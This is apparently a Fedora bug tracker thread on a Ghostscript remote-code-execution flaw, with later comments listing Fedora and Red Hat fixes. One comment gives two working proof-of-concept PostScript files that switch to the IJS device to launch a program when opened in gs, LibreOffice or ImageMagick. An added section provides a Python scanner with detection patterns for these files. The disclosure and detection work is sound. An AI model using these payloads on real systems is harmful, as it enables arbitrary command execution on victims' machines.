In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. References: https://bugs.ghostscript.com/show_bug.cgi?id=707051 https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5 https://ghostscript.com/
Created ghostscript tracking bugs for this issue: Affects: fedora-all [bug 2241112]
So, what's the current status regarding this vulnerability? This is highly critical: At the moment, on a fully updated Fedora 38, attackers can execute arbitrary commands when users open/use postscript files. In the following, I'll describe two ways to exploit this (and start gnome-calculator as an example):

1. Run `gs calc.ps` with the following file (or insert it as an image in LibreOffice):

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox: 36 36 576 756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog
<< /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice
------------------

2. Via ImageMagick: run `convert calc-convert.ps calc-convert.png`:

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox: 36 36 576 756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog
% this is somehow needed to not get a null pointer dereference (will basically initialize the ijs device a bit, and then complain about unset IjsServer):
{ (ijs) finddevice setdevice } stopped {} {} ifelse pop
% set ijserver to payload
{ mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice putdeviceprops setdevice } stopped {} {} ifelse pop
------------------

What's the plan here? :)
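Both variants above do the same two things the advisory names: select the `ijs` output device and set the `IjsServer` parameter. Until patched builds are deployed, a defender can at least flag PostScript/EPS inputs that do either before they reach `gs`, `convert`, or LibreOffice. The scanner below is an added example for this bug report, not Ghostscript or Fedora code; the function names, the indicator labels and the sample documents are the editor's own constructions. It strips PostScript comments first (honouring `(...)` strings, where `%` is ordinary data) so that inert mentions in comments are not reported, then reports the line number and which of the three indicators matched.

```python
"""Static scanner for PostScript inputs that switch to the IJS device or set
IjsServer, the two actions the Ghostscript advisory above describes.
Added example for this bug report; not Ghostscript code.  All names below
are the editor's own choices."""
import re
from typing import List, Tuple

# Indicators, keyed by a short label.  They are applied to the file with
# PostScript comments removed, so text that the interpreter ignores is not
# reported.  A match inside a (...) string is still reported; that is an
# accepted false positive for a pre-filter like this one.
INDICATORS = {
    "setpagedevice-ijs": re.compile(r"/OutputDevice\s*/ijs\b"),
    "finddevice-ijs": re.compile(r"\(ijs\)\s*finddevice"),
    "ijsserver-param": re.compile(r"/IjsServer\b"),
}


def strip_comments(ps_text: str) -> str:
    """Drop '%' comments but keep everything inside (...) strings.
    Nesting and backslash escapes inside strings are honoured so a ')' in a
    string does not end it early.  Newlines are kept so that line numbers
    in the stripped text match the original file."""
    out = []
    depth = 0          # current (...) nesting depth; 0 means outside a string
    i = 0
    n = len(ps_text)
    while i < n:
        ch = ps_text[i]
        if depth == 0 and ch == "%":
            # Comment: skip to end of line, leaving the newline in place.
            while i < n and ps_text[i] not in "\r\n":
                i += 1
            continue
        if ch == "\\" and depth > 0:
            out.append(ps_text[i:i + 2])   # escaped char inside a string
            i += 2
            continue
        if ch == "(":
            depth += 1
        elif ch == ")" and depth > 0:
            depth -= 1
        out.append(ch)
        i += 1
    return "".join(out)


def scan_postscript(ps_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, label, stripped_line) for every indicator hit."""
    findings = []
    lines = strip_comments(ps_text).splitlines()
    for lineno, line in enumerate(lines, start=1):
        for label, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


def is_suspicious(ps_text: str) -> bool:
    """True if the input tries to select the IJS device or set IjsServer."""
    return bool(scan_postscript(ps_text))


# Constructed sample inputs (not real files) modelled on the two shapes in
# comment #3; the IjsServer value is a placeholder, not a real program.
SETPAGEDEVICE_SAMPLE = """%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 100 100
%%EndComments
<< /OutputDevice /ijs /IjsServer (some-program) >> setpagedevice
showpage
"""

FINDDEVICE_SAMPLE = """%!PS-Adobe-3.0
% a comment mentioning /IjsServer is inert and must not be reported
{ (ijs) finddevice setdevice } stopped pop
{ mark /IjsServer (some-program) (ijs) finddevice putdeviceprops setdevice } stopped pop
showpage
"""

BENIGN_SAMPLE = """%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 100 100
/Times-Roman findfont 12 scalefont setfont
10 10 moveto (100% plain text with (nested) parens) show
showpage
"""

if __name__ == "__main__":
    for name, sample in [("setpagedevice", SETPAGEDEVICE_SAMPLE),
                         ("finddevice", FINDDEVICE_SAMPLE),
                         ("benign", BENIGN_SAMPLE)]:
        print(name, "->", scan_postscript(sample))
```

This is a pre-filter, not a substitute for the fix: the real mitigation is the patched Ghostscript from the referenced commit and the distribution updates listed below, since the interpreter, not a regex, decides what `setpagedevice` and `finddevice` are allowed to do under SAFER.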
Just to be clear: opening a LibreOffice document is enough to trigger the RCE: we've made a video here: https://twitter.com/RedTeamPT/status/1712379361146318896 Here's a video which shows the exploit for convert: https://twitter.com/RedTeamPT/status/1712379364136964411
(In reply to Alexander Neumann from comment #4)
> Just to be clear: opening a LibreOffice document is enough to trigger the
> RCE: we've made a video here:
> https://twitter.com/RedTeamPT/status/1712379361146318896
>
> Here's a video which shows the exploit for convert:
> https://twitter.com/RedTeamPT/status/1712379364136964411

Hey Alexander, thanks for flagging that this had been missed. Updates to supported versions of Fedora (38: https://bodhi.fedoraproject.org/updates/FEDORA-2023-66d60c3df7, 39: https://bodhi.fedoraproject.org/updates/FEDORA-2023-c2665a9ff3) have been submitted, and will roll out once they have enough upvotes or time passes. I've also proposed this as a Final Release Blocker for Fedora 39, so it should be fixed from day one there (https://pagure.io/fedora-qa/blocker-review/issue/1408).
Cool, thanks for the feedback! We really appreciate your work!
This issue has been addressed in the following products: Red Hat Enterprise Linux 9.0 Extended Update Support Via RHSA-2023:5868 https://access.redhat.com/errata/RHSA-2023:5868
This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2023:6265 https://access.redhat.com/errata/RHSA-2023:6265
This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2023:6732 https://access.redhat.com/errata/RHSA-2023:6732